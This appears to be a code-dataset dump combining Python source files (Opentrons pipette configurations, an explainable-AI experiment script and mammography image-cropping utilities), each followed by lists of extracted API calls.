    pick_up_current=0.1,
    aspirate_flow_rate=10 / DEFAULT_ASPIRATE_SECONDS,
    dispense_flow_rate=10 / DEFAULT_DISPENSE_SECONDS,
    ul_per_mm=0.77,
    channels=1,
    name='p10_single_v1',
    model_offset=[0.0, 0.0, Z_OFFSET_P10],
    plunger_current=0.3,
    drop_tip_current=0.5,
    tip_length=33
)

p10_multi = pipette_config(
    plunger_positions={
        'top': 19,
        'bottom': 4,
        'blow_out': 1,
        'drop_tip': -4.5
    },
    pick_up_current=0.2,
    aspirate_flow_rate=10 / DEFAULT_ASPIRATE_SECONDS,
    dispense_flow_rate=10 / DEFAULT_DISPENSE_SECONDS,
    ul_per_mm=0.77,
    channels=8,
    name='p10_multi_v1',
    model_offset=[0.0, Y_OFFSET_MULTI, Z_OFFSET_MULTI],
    plunger_current=0.5,
    drop_tip_current=0.5,
    tip_length=33
)

p50_single = pipette_config(
    plunger_positions={
        'top': 19,
        'bottom': 2.5,
        'blow_out': 2,
        'drop_tip': -5
    },
    pick_up_current=0.1,
    aspirate_flow_rate=50 / DEFAULT_ASPIRATE_SECONDS,
    dispense_flow_rate=50 / DEFAULT_DISPENSE_SECONDS,
    ul_per_mm=3.35,
    channels=1,
    name='p50_single_v1',
    model_offset=[0.0, 0.0, Z_OFFSET_P50],
    plunger_current=0.3,
    drop_tip_current=0.5,
    tip_length=51.7
)

p50_multi = pipette_config(
    plunger_positions={
        'top': 19,
        'bottom': 2.5,
        'blow_out': 2,
        'drop_tip': -4
    },
    pick_up_current=0.3,
    aspirate_flow_rate=50 / DEFAULT_ASPIRATE_SECONDS,
    dispense_flow_rate=50 / DEFAULT_DISPENSE_SECONDS,
    ul_per_mm=3.35,
    channels=8,
    name='p50_multi_v1',
    model_offset=[0.0, Y_OFFSET_MULTI, Z_OFFSET_MULTI],
    plunger_current=0.5,
    drop_tip_current=0.5,
    tip_length=51.7
)

p300_single = pipette_config(
    plunger_positions={
        'top': 19,
        'bottom': 2.5,
        'blow_out': 1,
        'drop_tip': -5
    },
    pick_up_current=0.1,
    aspirate_flow_rate=300 / DEFAULT_ASPIRATE_SECONDS,
    dispense_flow_rate=300 / DEFAULT_DISPENSE_SECONDS,
    ul_per_mm=18.7,
    channels=1,
    name='p300_single_v1',
    model_offset=[0.0, 0.0, Z_OFFSET_P300],
    plunger_current=0.3,
    drop_tip_current=0.5,
    tip_length=51.7
)

p300_multi = pipette_config(
    plunger_positions={
        'top': 19,
        'bottom': 3,
        'blow_out': 1,
        'drop_tip': -3.5
    },
    pick_up_current=0.3,
    aspirate_flow_rate=300 / DEFAULT_ASPIRATE_SECONDS,
    dispense_flow_rate=300 / DEFAULT_DISPENSE_SECONDS,
    ul_per_mm=19,
    channels=8,
    name='p300_multi_v1',
    model_offset=[0.0, Y_OFFSET_MULTI, Z_OFFSET_MULTI],
    plunger_current=0.5,
    drop_tip_current=0.5,
    tip_length=51.7
)

p1000_single = pipette_config(
    plunger_positions={
        'top': 19,
        'bottom': 3,
        'blow_out': 1,
        'drop_tip': -5
    },
    pick_up_current=0.1,
    aspirate_flow_rate=1000 / DEFAULT_ASPIRATE_SECONDS,
    dispense_flow_rate=1000 / DEFAULT_DISPENSE_SECONDS,
    ul_per_mm=65,
    channels=1,
    name='p1000_single_v1',
    model_offset=[0.0, 0.0, Z_OFFSET_P1000],
    plunger_current=0.5,
    drop_tip_current=0.5,
    tip_length=76.7
)

# Lookup table from model string to its fallback config.
fallback_configs = {
    'p10_single_v1': p10_single,
    'p10_multi_v1': p10_multi,
    'p50_single_v1': p50_single,
    'p50_multi_v1': p50_multi,
    'p300_single_v1': p300_single,
    'p300_multi_v1': p300_multi,
    'p1000_single_v1': p1000_single
}
def select_config(model: str):
    """Build a pipette_config for *model*, preferring on-disk data.

    Values come from the settings file when available; when the file data
    cannot be turned into a config, the hard-coded fallback is used.
    """
    file_cfg = _load_config_dict_from_file(model)
    built = _create_config_from_dict(file_cfg, model)
    return built if built else fallback_configs.get(model)
# ----------------------- end deprecated data -------------------------
# Notes:
# - multi-channel pipettes share the same dimensional offsets
# - single-channel pipettes have different lengths
# - Default number of seconds to aspirate/dispense a pipette's full volume,
# and these times were chosen to mimic normal human-pipetting motions.
# However, accurate speeds are dependent on environment (ex: liquid
# viscosity), therefore a pipette's flow-rates (ul/sec) should be set by
# protocol writer
# model-specific ID's, saved with each Pipette's memory
# used to identifiy what model pipette is currently connected to machine
# Maps (channel kind, max volume in ul) -> canonical model string.
PIPETTE_MODEL_IDENTIFIERS = {
    'single': {
        '10': 'p10_single_v1',
        '50': 'p50_single_v1',
        '300': 'p300_single_v1',
        '1000': 'p1000_single_v1'
    },
    'multi': {
        '10': 'p10_multi_v1',
        '50': 'p50_multi_v1',
        '300': 'p300_multi_v1',
    }
}

# Eagerly-built config for every known model (file data with fallbacks).
configs = {
    model: select_config(model)
    for model in [
        'p10_single_v1',
        'p10_multi_v1',
        'p50_single_v1',
        'p50_multi_v1',
        'p300_single_v1',
        'p300_multi_v1',
        'p1000_single_v1']}
def load(pipette_model: str) -> pipette_config:
    """Look up the configuration for *pipette_model*, reading fresh data.

    The settings file is consulted on every call, so on-disk changes are
    picked up by newly instantiated objects without a restart.  A model
    string absent from the top-level keys of "pipette-config.json"
    raises ``KeyError``.

    :param pipette_model: a top-level key in "pipette-config.json"
    :return: a `pipette_config` instance
    """
    return select_config(pipette_model)
| [
"logging.getLogger",
"os.path.exists",
"collections.namedtuple",
"os.path.dirname",
"opentrons.config.get_config_index",
"json.load"
] | [((180, 207), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (197, 207), False, 'import logging\n'), ((348, 576), 'collections.namedtuple', 'namedtuple', (['"""pipette_config"""', "['plunger_positions', 'pick_up_current', 'aspirate_flow_rate',\n 'dispense_flow_rate', 'ul_per_mm', 'channels', 'name', 'model_offset',\n 'plunger_current', 'drop_tip_current', 'tip_length']"], {}), "('pipette_config', ['plunger_positions', 'pick_up_current',\n 'aspirate_flow_rate', 'dispense_flow_rate', 'ul_per_mm', 'channels',\n 'name', 'model_offset', 'plunger_current', 'drop_tip_current',\n 'tip_length'])\n", (358, 576), False, 'from collections import namedtuple\n'), ((146, 171), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (161, 171), False, 'import os\n'), ((249, 267), 'opentrons.config.get_config_index', 'get_config_index', ([], {}), '()\n', (265, 267), False, 'from opentrons.config import get_config_index\n'), ((3107, 3134), 'os.path.exists', 'os.path.exists', (['config_file'], {}), '(config_file)\n', (3121, 3134), False, 'import os\n'), ((3202, 3217), 'json.load', 'json.load', (['conf'], {}), '(conf)\n', (3211, 3217), False, 'import json\n')] |
# -*- coding: utf-8 -*-
"""
Created on Sat Nov 28 17:16:29 2020
@author: mauro
"""
import logging
import os
from explanation import (
CounterfactualExplanation,
PermutationExplanation,
ShapleyExplanation,
SurrogateModelExplanation,
ControlGroupExplanation
)
from src.model.config import path_base
from src.model.DataConfig import DataConfig
from src.model.utils import (
average_the_ratings,
get_dataset,
load_pickle,
map_index_to_sample,
shuffle_in_unison,
experiment_setup,
create_treatment_dataframe
)
from src.explanation.surrogate_manual import run
logger = logging.getLogger(__file__)
logger.setLevel(logging.DEBUG)

# Resolve project paths and load the per-field data configuration.
path_config = os.path.join(path_base, "src", "resources")
path_load = os.path.join(path_base, "dataset", "training")
path_model_base = os.path.join(path_base, "model")
data = DataConfig(path_config)
data_config = data.load_config()
def print_output(sample, output):
    """Pretty-print one explanation result.

    *output* is a (score_text, method_text, explanation_text) triple; each
    part is printed after a dashed divider, following the sample label.
    """
    score_text, method_text, explanation_text = output
    divider = '---' * 20
    print(sample)
    for part in (score_text, method_text, explanation_text):
        print(divider)
        print(part)
    print("\n")
def find_winner(X, y):
    """Return the row of ``y`` with the highest model prediction.

    NOTE(review): relies on the module-level ``model`` rebound inside the
    field loop below rather than taking it as a parameter -- confirm this
    is intentional before reuse.
    """
    y_pred = model.predict(X.values)
    y_winner = y.copy()
    y_winner['y_pred'] = y_pred
    y_winner.reset_index(inplace=True)
    # argmax over predictions after reset_index, so iloc picks that row.
    index_winner = y_winner['y_pred'].argmax()
    df_winner = y_winner.iloc[index_winner]
    return df_winner
# Run the full explanation experiment for each rating field: load the
# newest matching model, find and remove the winning entry, then generate
# explanations for every treatment group.
for field in ['all']:
    # Newest model file whose name contains the field.
    model_name = [name for name in os.listdir(path_model_base) if field in name][-1]
    print(model_name)
    path_model = os.path.join(path_model_base, model_name)
    path_save = os.path.join(os.path.dirname(os.getcwd()), "reports", field)

    config = data_config[field]
    config["folder"] = field

    model = load_pickle(
        path_model=path_model,
        model_name="XGBRegressor.pickle",
    )

    X, y = get_dataset(
        path_load=path_load,
        name=data_config["dataset"],
        target=config["target"],
        features=config["features"],
    )

    # Collapse the individual rater columns into one averaged rating.
    new_name = f"{field}.player.rating"
    y = average_the_ratings(y, list(y), new_name)

    df_winner = find_winner(X, y)
    df_winner.to_csv(
        os.path.join(path_save, 'winner.csv'),
        sep=";",
        encoding="utf-8-sig"
    )

    print(X.loc[df_winner['Entry ID']].tolist())

    # remove winner
    X.drop(df_winner['Entry ID'], inplace=True)
    y.drop(df_winner['Entry ID'], inplace=True)

    X, y = shuffle_in_unison(X, y)

    # Assign samples to treatment groups and persist the assignment.
    samples_dict = experiment_setup(X)
    df_treatment = create_treatment_dataframe(samples_dict)
    df_treatment.to_csv(
        os.path.join(path_save, 'treatment_groups.csv'),
        sep=";",
        encoding="utf-8-sig",
    )

    # control group
    for samples, sparse, show_rating in samples_dict["control_group"]:
        control = ControlGroupExplanation(X, y, model, sparse, show_rating, config)
        for sample in samples:
            sample_index = map_index_to_sample(X, sample)
            output = control.main(sample_index, sample)
            print(sparse, show_rating)
            print_output(sample, output)

    # Global, Non-contrastive
    for samples, sparse, show_rating in samples_dict["permutation"]:
        permutation = PermutationExplanation(
            X, y, model, sparse, show_rating, config
        )
        for sample in samples:
            sample_index = map_index_to_sample(X, sample)
            output = permutation.main(sample_index, sample)
            print(sparse, show_rating)
            print_output(sample, output)

    # Local, Non-contrastive
    for samples, sparse, show_rating in samples_dict["shapley"]:
        shapely = ShapleyExplanation(X, y, model, sparse, show_rating, config)
        for sample in samples:
            sample_index = map_index_to_sample(X, sample)
            output = shapely.main(sample_index, sample)
            print(sparse, show_rating)
            print_output(sample, output)

    # Global, Contrastive
    for samples, sparse, show_rating in samples_dict["surrogate"]:
        surrogate = SurrogateModelExplanation(
            X, y, model, sparse, show_rating, config
        )
        for sample in samples:
            sample_index = map_index_to_sample(X, sample)
            output = surrogate.main(sample_index, sample)
            print(sparse, show_rating)
            print_output(sample, output)

    # Local, Contrastive
    for samples, sparse, show_rating in samples_dict["counterfactual"]:
        counterfactual = CounterfactualExplanation(
            X, y, model, sparse, show_rating, config, y_desired=8.
        )
        for sample in samples:
            sample_index = map_index_to_sample(X, sample)
            output = counterfactual.main(sample_index, sample)
            print(sparse, show_rating)
            print_output(sample, output)
| [
"logging.getLogger",
"explanation.ShapleyExplanation",
"explanation.PermutationExplanation",
"os.listdir",
"src.model.utils.create_treatment_dataframe",
"explanation.SurrogateModelExplanation",
"src.model.utils.get_dataset",
"os.path.join",
"src.model.DataConfig.DataConfig",
"src.model.utils.exper... | [((619, 646), 'logging.getLogger', 'logging.getLogger', (['__file__'], {}), '(__file__)\n', (636, 646), False, 'import logging\n'), ((694, 737), 'os.path.join', 'os.path.join', (['path_base', '"""src"""', '"""resources"""'], {}), "(path_base, 'src', 'resources')\n", (706, 737), False, 'import os\n'), ((750, 796), 'os.path.join', 'os.path.join', (['path_base', '"""dataset"""', '"""training"""'], {}), "(path_base, 'dataset', 'training')\n", (762, 796), False, 'import os\n'), ((815, 847), 'os.path.join', 'os.path.join', (['path_base', '"""model"""'], {}), "(path_base, 'model')\n", (827, 847), False, 'import os\n'), ((856, 879), 'src.model.DataConfig.DataConfig', 'DataConfig', (['path_config'], {}), '(path_config)\n', (866, 879), False, 'from src.model.DataConfig import DataConfig\n'), ((1639, 1680), 'os.path.join', 'os.path.join', (['path_model_base', 'model_name'], {}), '(path_model_base, model_name)\n', (1651, 1680), False, 'import os\n'), ((1838, 1906), 'src.model.utils.load_pickle', 'load_pickle', ([], {'path_model': 'path_model', 'model_name': '"""XGBRegressor.pickle"""'}), "(path_model=path_model, model_name='XGBRegressor.pickle')\n", (1849, 1906), False, 'from src.model.utils import average_the_ratings, get_dataset, load_pickle, map_index_to_sample, shuffle_in_unison, experiment_setup, create_treatment_dataframe\n'), ((1942, 2062), 'src.model.utils.get_dataset', 'get_dataset', ([], {'path_load': 'path_load', 'name': "data_config['dataset']", 'target': "config['target']", 'features': "config['features']"}), "(path_load=path_load, name=data_config['dataset'], target=config\n ['target'], features=config['features'])\n", (1953, 2062), False, 'from src.model.utils import average_the_ratings, get_dataset, load_pickle, map_index_to_sample, shuffle_in_unison, experiment_setup, create_treatment_dataframe\n'), ((2557, 2580), 'src.model.utils.shuffle_in_unison', 'shuffle_in_unison', (['X', 'y'], {}), '(X, y)\n', (2574, 2580), False, 'from 
src.model.utils import average_the_ratings, get_dataset, load_pickle, map_index_to_sample, shuffle_in_unison, experiment_setup, create_treatment_dataframe\n'), ((2613, 2632), 'src.model.utils.experiment_setup', 'experiment_setup', (['X'], {}), '(X)\n', (2629, 2632), False, 'from src.model.utils import average_the_ratings, get_dataset, load_pickle, map_index_to_sample, shuffle_in_unison, experiment_setup, create_treatment_dataframe\n'), ((2653, 2693), 'src.model.utils.create_treatment_dataframe', 'create_treatment_dataframe', (['samples_dict'], {}), '(samples_dict)\n', (2679, 2693), False, 'from src.model.utils import average_the_ratings, get_dataset, load_pickle, map_index_to_sample, shuffle_in_unison, experiment_setup, create_treatment_dataframe\n'), ((2265, 2302), 'os.path.join', 'os.path.join', (['path_save', '"""winner.csv"""'], {}), "(path_save, 'winner.csv')\n", (2277, 2302), False, 'import os\n'), ((2728, 2775), 'os.path.join', 'os.path.join', (['path_save', '"""treatment_groups.csv"""'], {}), "(path_save, 'treatment_groups.csv')\n", (2740, 2775), False, 'import os\n'), ((2942, 3007), 'explanation.ControlGroupExplanation', 'ControlGroupExplanation', (['X', 'y', 'model', 'sparse', 'show_rating', 'config'], {}), '(X, y, model, sparse, show_rating, config)\n', (2965, 3007), False, 'from explanation import CounterfactualExplanation, PermutationExplanation, ShapleyExplanation, SurrogateModelExplanation, ControlGroupExplanation\n'), ((3363, 3427), 'explanation.PermutationExplanation', 'PermutationExplanation', (['X', 'y', 'model', 'sparse', 'show_rating', 'config'], {}), '(X, y, model, sparse, show_rating, config)\n', (3385, 3427), False, 'from explanation import CounterfactualExplanation, PermutationExplanation, ShapleyExplanation, SurrogateModelExplanation, ControlGroupExplanation\n'), ((3792, 3852), 'explanation.ShapleyExplanation', 'ShapleyExplanation', (['X', 'y', 'model', 'sparse', 'show_rating', 'config'], {}), '(X, y, model, sparse, show_rating, 
config)\n', (3810, 3852), False, 'from explanation import CounterfactualExplanation, PermutationExplanation, ShapleyExplanation, SurrogateModelExplanation, ControlGroupExplanation\n'), ((4192, 4259), 'explanation.SurrogateModelExplanation', 'SurrogateModelExplanation', (['X', 'y', 'model', 'sparse', 'show_rating', 'config'], {}), '(X, y, model, sparse, show_rating, config)\n', (4217, 4259), False, 'from explanation import CounterfactualExplanation, PermutationExplanation, ShapleyExplanation, SurrogateModelExplanation, ControlGroupExplanation\n'), ((4657, 4743), 'explanation.CounterfactualExplanation', 'CounterfactualExplanation', (['X', 'y', 'model', 'sparse', 'show_rating', 'config'], {'y_desired': '(8.0)'}), '(X, y, model, sparse, show_rating, config,\n y_desired=8.0)\n', (4682, 4743), False, 'from explanation import CounterfactualExplanation, PermutationExplanation, ShapleyExplanation, SurrogateModelExplanation, ControlGroupExplanation\n'), ((1730, 1741), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (1739, 1741), False, 'import os\n'), ((3066, 3096), 'src.model.utils.map_index_to_sample', 'map_index_to_sample', (['X', 'sample'], {}), '(X, sample)\n', (3085, 3096), False, 'from src.model.utils import average_the_ratings, get_dataset, load_pickle, map_index_to_sample, shuffle_in_unison, experiment_setup, create_treatment_dataframe\n'), ((3508, 3538), 'src.model.utils.map_index_to_sample', 'map_index_to_sample', (['X', 'sample'], {}), '(X, sample)\n', (3527, 3538), False, 'from src.model.utils import average_the_ratings, get_dataset, load_pickle, map_index_to_sample, shuffle_in_unison, experiment_setup, create_treatment_dataframe\n'), ((3911, 3941), 'src.model.utils.map_index_to_sample', 'map_index_to_sample', (['X', 'sample'], {}), '(X, sample)\n', (3930, 3941), False, 'from src.model.utils import average_the_ratings, get_dataset, load_pickle, map_index_to_sample, shuffle_in_unison, experiment_setup, create_treatment_dataframe\n'), ((4352, 4382), 
'src.model.utils.map_index_to_sample', 'map_index_to_sample', (['X', 'sample'], {}), '(X, sample)\n', (4371, 4382), False, 'from src.model.utils import average_the_ratings, get_dataset, load_pickle, map_index_to_sample, shuffle_in_unison, experiment_setup, create_treatment_dataframe\n'), ((4831, 4861), 'src.model.utils.map_index_to_sample', 'map_index_to_sample', (['X', 'sample'], {}), '(X, sample)\n', (4850, 4861), False, 'from src.model.utils import average_the_ratings, get_dataset, load_pickle, map_index_to_sample, shuffle_in_unison, experiment_setup, create_treatment_dataframe\n'), ((1550, 1577), 'os.listdir', 'os.listdir', (['path_model_base'], {}), '(path_model_base)\n', (1560, 1577), False, 'import os\n')] |
# Copyright (C) 2019 <NAME>, <NAME>, <NAME>, <NAME>, <NAME>, <NAME>,
# <NAME>, <NAME>, <NAME>, <NAME>, <NAME>, <NAME>,
# <NAME>, <NAME>, <NAME>, <NAME>, <NAME>, <NAME>,
# <NAME>, <NAME>, <NAME>, <NAME>, <NAME>, <NAME>,
# <NAME>, <NAME>, <NAME>, <NAME>, <NAME>, <NAME>,
# <NAME>, <NAME>
#
# This file is part of breast_cancer_classifier.
#
# breast_cancer_classifier is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# breast_cancer_classifier is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with breast_cancer_classifier. If not, see <http://www.gnu.org/licenses/>.
# ==============================================================================
import cv2
import numpy as np
from src.constants import VIEWS
def shift_window_inside_image(start, end, image_axis_size, input_axis_size):
    """
    Clamp a [start, end) window of length ``input_axis_size`` so it lies
    inside an axis of length ``image_axis_size``.

    If the window hangs over the low edge it is snapped to 0; otherwise,
    if it hangs over the high edge it is snapped against the axis end.
    The window length is preserved in both cases.
    """
    if start < 0:
        # Snap to the low edge, keeping the window length.
        start, end = 0, input_axis_size
    elif end > image_axis_size:
        # Snap to the high edge, keeping the window length.
        end = image_axis_size
        start = image_axis_size - input_axis_size
    return start, end
def zero_pad_and_align_window(image_axis_size, input_axis_size, max_crop_and_size_noise, bidirectional):
    """
    Compute zero-padding and window placement for an axis that is too
    short to fit the crop window plus its noise margin.

    Returns ``(start, end, pad_front, pad_back)`` where ``pad_front`` /
    ``pad_back`` are the number of zero rows/columns to prepend/append,
    and ``[start, end)`` is the window position inside the padded axis.
    In bidirectional mode the padding is split (roughly) evenly and the
    window is offset by the noise margin; otherwise all padding goes to
    the back and the window starts at 0.
    """
    noise_margin = max_crop_and_size_noise * (2 if bidirectional else 1)
    total_pad = input_axis_size - image_axis_size + noise_margin
    # Caller guarantees the axis actually needs padding.
    assert total_pad >= 0
    if bidirectional:
        front = int(total_pad / 2)
        window_start = max_crop_and_size_noise
    else:
        front = 0
        window_start = 0
    back = total_pad - front
    return window_start, window_start + input_axis_size, front, back
def simple_resize(image_to_resize, size):
    """
    Resize ``image_to_resize`` to ``size`` (height, width) using bicubic
    interpolation, restoring a dropped trailing channel axis if needed.
    """
    resized = cv2.resize(image_to_resize, (size[1], size[0]), interpolation=cv2.INTER_CUBIC)
    # cv2.resize squeezes a single-channel (H, W, 1) input down to (H, W);
    # put the channel axis back so the output rank matches the input rank.
    lost_channel_axis = (
        len(image_to_resize.shape) == 3
        and len(resized.shape) == 2
        and image_to_resize.shape[2] == 1
    )
    if lost_channel_axis:
        resized = np.expand_dims(resized, 2)
    return resized
def crop_image(image, input_size, borders):
    """
    Cut the window described by ``borders`` (top, bottom, left, right)
    out of ``image``, resizing the crop when its shape does not already
    match ``input_size``.
    """
    top, bottom, left, right = borders[0], borders[1], borders[2], borders[3]
    cropped = image[top:bottom, left:right]
    # Only resample when the window dimensions differ from the target size.
    size_matches = (bottom - top) == input_size[0] and (right - left) == input_size[1]
    if not size_matches:
        cropped = simple_resize(cropped, input_size)
    return cropped
def window_location_at_center_point(input_size, center_y, center_x):
    """
    Return the ``(top, bottom, left, right)`` borders of a window of
    shape ``input_size`` centered (up to integer rounding) on
    ``(center_y, center_x)``.
    """
    half_height = input_size[0] // 2
    half_width = input_size[1] // 2
    top = center_y - half_height
    left = center_x - half_width
    # Anchor bottom/right on top/left so odd sizes keep the full extent.
    return top, top + input_size[0], left, left + input_size[1]
def sample_crop_best_center(image, input_size, random_number_generator, max_crop_noise, max_crop_size_noise,
                            best_center, view):
    """
    Crops using the best center point and ideal window size.
    Pads small images to have enough room for crop noise and size noise.
    Applies crop noise in location of the window borders.

    Args:
        image: array of shape (H, W, C) — the channel axis is assumed
            present (see the zero-padding that reads image.shape[2]).
        input_size: (height, width) of the desired crop window.
        random_number_generator: numpy-style RNG providing .uniform().
        max_crop_noise: (y, x) maximum window translation, in pixels.
        max_crop_size_noise: maximum size jitter applied later by sample_crop.
        best_center: (center_y, center_x) ideal window center.
        view: mammography view label understood by VIEWS.is_cc/is_mlo.

    Returns:
        (image, borders): the (possibly zero-padded) image and the
        np.int32 array (top, bottom, left, right) of the noisy window.
    """
    max_crop_noise = np.array(max_crop_noise)
    crop_noise_multiplier = np.zeros(2, dtype=np.float32)
    if max_crop_noise.any():
        # there is no point in sampling crop_noise_multiplier if it's going to be multiplied by (0, 0)
        crop_noise_multiplier = random_number_generator.uniform(low=-1.0, high=1.0, size=2)
    center_y, center_x = best_center
    # get the window around the center point. The window might be outside of the image.
    top, bottom, left, right = window_location_at_center_point(input_size, center_y, center_x)
    pad_y_top, pad_y_bottom, pad_x_right = 0, 0, 0
    if VIEWS.is_cc(view):
        if image.shape[0] < input_size[0] + (max_crop_noise[0] + max_crop_size_noise) * 2:
            # Image is smaller than window size + noise margin in y direction.
            # CC view: pad at both top and bottom
            top, bottom, pad_y_top, pad_y_bottom = zero_pad_and_align_window(image.shape[0], input_size[0],
                                                                             max_crop_noise[0] + max_crop_size_noise,
                                                                             True)
    elif VIEWS.is_mlo(view):
        if image.shape[0] < input_size[0] + max_crop_noise[0] + max_crop_size_noise:
            # Image is smaller than window size + noise margin in y direction.
            # MLO view: only pad at the bottom
            top, bottom, _, pad_y_bottom = zero_pad_and_align_window(image.shape[0], input_size[0],
                                                                      max_crop_noise[0] + max_crop_size_noise, False)
    else:
        raise KeyError("Unknown view", view)
    # Horizontal padding is always one-sided (appended on the right).
    if image.shape[1] < input_size[1] + max_crop_noise[1] + max_crop_size_noise:
        # Image is smaller than window size + noise margin in x direction.
        left, right, _, pad_x_right = zero_pad_and_align_window(image.shape[1], input_size[1],
                                                                max_crop_noise[1] + max_crop_size_noise, False)
    # Pad image if necessary by allocating new memory and copying contents over
    if pad_y_top > 0 or pad_y_bottom > 0 or pad_x_right > 0:
        new_zero_array = np.zeros((
            image.shape[0] + pad_y_top + pad_y_bottom,
            image.shape[1] + pad_x_right, image.shape[2]), dtype=image.dtype)
        new_zero_array[pad_y_top: image.shape[0] + pad_y_top, 0: image.shape[1]] = image
        image = new_zero_array
    # if window is drawn outside of image, shift it to be inside the image.
    top, bottom = shift_window_inside_image(top, bottom, image.shape[0], input_size[0])
    left, right = shift_window_inside_image(left, right, image.shape[1], input_size[1])
    # Force the noise direction towards the side that still has room.
    if top == 0:
        # there is nowhere to shift upwards, we only apply noise downwards
        crop_noise_multiplier[0] = np.abs(crop_noise_multiplier[0])
    elif bottom == image.shape[0]:
        # there is nowhere to shift down, we only apply noise upwards
        crop_noise_multiplier[0] = -np.abs(crop_noise_multiplier[0])
    # else: we do nothing to the noise multiplier
    if left == 0:
        # there is nowhere to shift left, we only apply noise to move right
        crop_noise_multiplier[1] = np.abs(crop_noise_multiplier[1])
    elif right == image.shape[1]:
        # there is nowhere to shift right, we only apply noise to move left
        crop_noise_multiplier[1] = -np.abs(crop_noise_multiplier[1])
    # else: we do nothing to the noise multiplier
    borders = np.array((top, bottom, left, right), dtype=np.int32)
    # Calculate maximum amount of how much the window can move for cropping noise
    top_margin = top
    bottom_margin = image.shape[0] - bottom
    left_margin = left
    right_margin = image.shape[1] - right
    if crop_noise_multiplier[0] >= 0:
        vertical_margin = bottom_margin
    else:
        vertical_margin = top_margin
    if crop_noise_multiplier[1] >= 0:
        horizontal_margin = right_margin
    else:
        horizontal_margin = left_margin
    if vertical_margin < max_crop_noise[0]:
        max_crop_noise[0] = vertical_margin
    if horizontal_margin < max_crop_noise[1]:
        max_crop_noise[1] = horizontal_margin
    # The same offset is added to both borders of an axis, so this noise
    # translates the window without changing its size.
    crop_noise = np.round(max_crop_noise * crop_noise_multiplier)
    crop_noise = np.array((crop_noise[0], crop_noise[0], crop_noise[1], crop_noise[1]), dtype=np.int32)
    borders = borders + crop_noise
    # this is to make sure that the cropping window isn't outside of the image
    assert (borders[0] >= 0) and (borders[1] <= image.shape[0]) and (borders[2] >= 0) and (borders[3] <= image.shape[
        1]), "Centre of the crop area is sampled such that the borders are outside of the image. Borders: " + str(
        borders) + ', image shape: ' + str(image.shape)
    # return the padded image and cropping window information
    return image, borders
def sample_crop(image, input_size, borders, random_number_generator, max_crop_size_noise):
    """
    Jitter the size of the crop window by moving each of its four
    borders independently, never pushing the window outside the image.

    Returns the adjusted (top, bottom, left, right) borders.
    """
    noise_multiplier = random_number_generator.uniform(low=-1.0, high=1.0, size=4)
    # The noise may not exceed the distance from any border to the image edge.
    margins = (
        borders[0],                   # room above the top border
        image.shape[0] - borders[1],  # room below the bottom border
        borders[2],                   # room left of the left border
        image.shape[1] - borders[3],  # room right of the right border
    )
    noise_limit = min(max_crop_size_noise, *margins)
    # Scale the shorter axis's noise so the window aspect ratio is roughly kept.
    if input_size[0] >= input_size[1]:
        vertical_limit = noise_limit
        horizontal_limit = np.round(noise_limit * (input_size[1] / input_size[0]))
    elif input_size[0] < input_size[1]:
        vertical_limit = np.round(noise_limit * (input_size[0] / input_size[1]))
        horizontal_limit = noise_limit
    else:
        raise RuntimeError()
    per_border_limit = np.array((vertical_limit, vertical_limit,
                                 horizontal_limit, horizontal_limit),
                                dtype=np.int32)
    size_noise = np.array(np.round(per_border_limit * noise_multiplier), dtype=np.int32)
    borders = borders + size_noise
    # this is to make sure that the cropping window isn't outside of the image
    assert (borders[0] >= 0) and (borders[1] <= image.shape[0]) and (borders[2] >= 0) and (borders[3] <= image.shape[
        1]), "Center of the crop area is sampled such that the borders are outside of the image. Borders: " + str(
        borders) + ', image shape: ' + str(image.shape)
    # Sanity check. make sure that the top is above the bottom
    assert borders[1] > borders[0], "Bottom above the top. Top: " + str(borders[0]) + ', bottom: ' + str(borders[1])
    # Sanity check. make sure that the left is left to the right
    assert borders[3] > borders[2], "Left on the right. Left: " + str(borders[2]) + ', right: ' + str(borders[3])
    return borders
def random_augmentation_best_center(image, input_size, random_number_generator, max_crop_noise=(0, 0),
                                    max_crop_size_noise=0, auxiliary_image=None,
                                    best_center=None, view=""):
    """
    Crop an augmentation window from ``image`` (and, if given, from
    ``auxiliary_image`` with the exact same window), applying random
    noise to the window's location and size.

    Returns a tuple ``(cropped_image, cropped_auxiliary)`` where the
    second element is ``None`` when no auxiliary image was supplied.
    """
    # Stack the main image (and any auxiliary image) along a channel axis
    # so every layer is cropped with one and the same window.
    stacked = np.expand_dims(image, 2)
    has_auxiliary = auxiliary_image is not None
    if has_auxiliary:
        stacked = np.concatenate([stacked, auxiliary_image], axis=2)
    stacked, window = sample_crop_best_center(
        stacked, input_size, random_number_generator, max_crop_noise,
        max_crop_size_noise, best_center, view)
    window = sample_crop(stacked, input_size, window, random_number_generator, max_crop_size_noise)
    cropped = crop_image(stacked, input_size, window)
    if has_auxiliary:
        return cropped[:, :, 0], cropped[:, :, 1:]
    return cropped[:, :, 0], None
| [
"numpy.abs",
"src.constants.VIEWS.is_cc",
"numpy.array",
"numpy.zeros",
"src.constants.VIEWS.is_mlo",
"numpy.expand_dims",
"numpy.concatenate",
"cv2.resize",
"numpy.round"
